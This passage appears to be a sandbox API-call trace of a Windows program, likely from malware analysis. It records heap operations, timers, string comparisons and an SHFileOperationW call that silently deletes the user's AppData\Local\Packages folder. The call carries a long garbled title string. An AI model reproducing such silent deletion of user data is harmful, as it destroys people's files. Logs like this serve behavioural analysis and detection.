hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0177.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0177.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0177.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0177.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0177.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4e) returned 0x29eb3c8 [0177.043] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Packages", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Packages", lpFilePart=0x8cf650*="Packages") returned 0x26 [0177.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb3c8 | out: hHeap=0x2af0000) returned 1 [0177.043] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages")) returned 0x10 [0177.043] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\Packages", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\Packages", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 32 [0196.659] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0196.659] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0197.415] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0197.415] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0198.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0198.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0198.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0198.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0198.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0198.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0198.740] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0198.740] TranslateMessage (lpMsg=0x8cf968) returned 0 [0198.740] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0198.740] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0198.740] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0198.740] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0198.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0198.740] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0198.740] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0198.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0198.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0198.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0198.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0198.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0198.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0198.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0198.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0198.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0198.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0198.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0198.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0198.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0198.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PeerDistRepub", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eerDistRepub", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="erDistRepub", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rDistRepub", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DistRepub", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="istRepub", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="stRepub", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tRepub", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Repub", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0198.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0198.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0198.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0198.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0198.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0198.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0198.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0198.743] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0198.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0198.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0198.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0198.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0198.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0198.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0198.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0198.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0198.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0198.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0198.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0198.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0198.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0198.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0198.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0198.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0198.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0198.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0198.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1c) returned 0x2a77bc0 [0198.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0198.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PeerDistRepub", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eerDistRepub", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0198.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="erDistRepub", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0198.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rDistRepub", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DistRepub", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0198.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="istRepub", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="stRepub", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tRepub", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0198.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0198.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0198.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0198.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0198.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0198.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0198.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0198.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0198.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0198.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0198.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 